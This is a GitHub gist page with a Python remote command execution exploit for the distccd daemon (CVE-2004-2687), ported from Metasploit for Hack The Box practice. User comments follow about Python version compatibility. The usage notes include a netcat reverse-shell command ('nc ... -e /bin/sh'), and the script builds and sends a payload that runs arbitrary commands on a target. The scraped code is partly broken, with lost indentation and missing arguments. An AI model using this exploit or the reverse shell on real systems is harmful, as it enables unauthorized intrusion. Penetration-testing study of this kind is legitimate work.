Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
# -*- coding: utf-8 -*-
distccd v1 RCE (CVE-2004-2687)
This exploit is ported from a public Metasploit exploit code :
The goal of that script is to avoid using Metasploit and to do it manually. (OSCP style)
I'm aware a Nmap script exists but for some reason I could not get it to work.
Lame Box (HTB):
local>nc -lvp 1403
local>./ -t -p 3632 -c "nc 1403 -e /bin/sh"
Enjoy your shell
Jean-Pierre LESUEUR
import socket
import string
import random
import argparse
Generate a random alpha num string (Evade some signature base detection?)
def rand_text_alphanumeric(len):
str = ""
for i in range(len):
str += random.choice(string.ascii_letters + string.digits)
return str
Read STDERR / STDOUT returned by remote service.
def read_std(s):
s.recv(4) # Ignore
len = int(s.recv(8), 16) # Get output length
if len != 0:
return s.recv(len)
Trigger Exploit
def exploit(command, host, port):
args = ["sh", "-c", command, "#", "-c", "main.c", "-o", "main.o"]
payload = "DIST00000001" + "ARGC%.8x" % len(args)
for arg in args:
payload += "ARGV%.8x%s" % (len(arg), arg)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if s.connect_ex((host, port)) == 0:
print("[\033[32mOK\033[39m] Connected to remote service")
dtag = "DOTI0000000A" + rand_text_alphanumeric(10)
print("\n--- BEGIN BUFFER ---\n")
buff = read_std(s) # STDERR
if buff:
buff = read_std(s) # STDOUT
if buff:
print("\n--- END BUFFER ---\n")
print("[\033[32mOK\033[39m] Done.")
except socket.timeout:
print("[\033[31mKO\033[39m] Socket Timeout")
except socket.error:
print("[\033[31mKO\033[39m] Socket Error")
except Exception:
print("[\033[31mKO\033[39m] Exception Raised")
print("[\033[31mKO\033[39m] Failed to connect to %s on port %d" % (host, port))
parser = argparse.ArgumentParser(description='DistCC Daemon - Command Execution (Metasploit)')
parser.add_argument('-t', action="store", dest="host", required=True, help="Target IP/HOST")
parser.add_argument('-p', action="store", type=int, dest="port", default=3632, help="DistCCd listening port")
parser.add_argument('-c', action="store", dest="command", default="id", help="Command to run on target system")
argv = parser.parse_args()
exploit(argv.command,, argv.port)
except IOError:
Copy link

Reelix commented Nov 2, 2020

Note that this script needs to be run using python2. If you attempt to run it with python3, it will connect to the service and simply fail.

Copy link

DarkCoderSc commented Nov 2, 2020

This script was build for Python3 and it works in my side ;)

Copy link

Chris-Lenz commented Nov 26, 2020

works for me in Python3 as well. Thank you

Copy link

epicn1337 commented Feb 6, 2021

thanks for this script fam.

Copy link

A1vinSmith commented Jul 27, 2021

Thank you, python2 for HTB Lame

Copy link

saunders-jake commented Nov 1, 2021

This only works in Python2 for me.

Copy link

DarkCoderSc commented Nov 17, 2021

I removed the #!/usr/bin/python for those that were confused.

Copy link

epicn1337 commented Nov 18, 2021

yeah it's cool thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment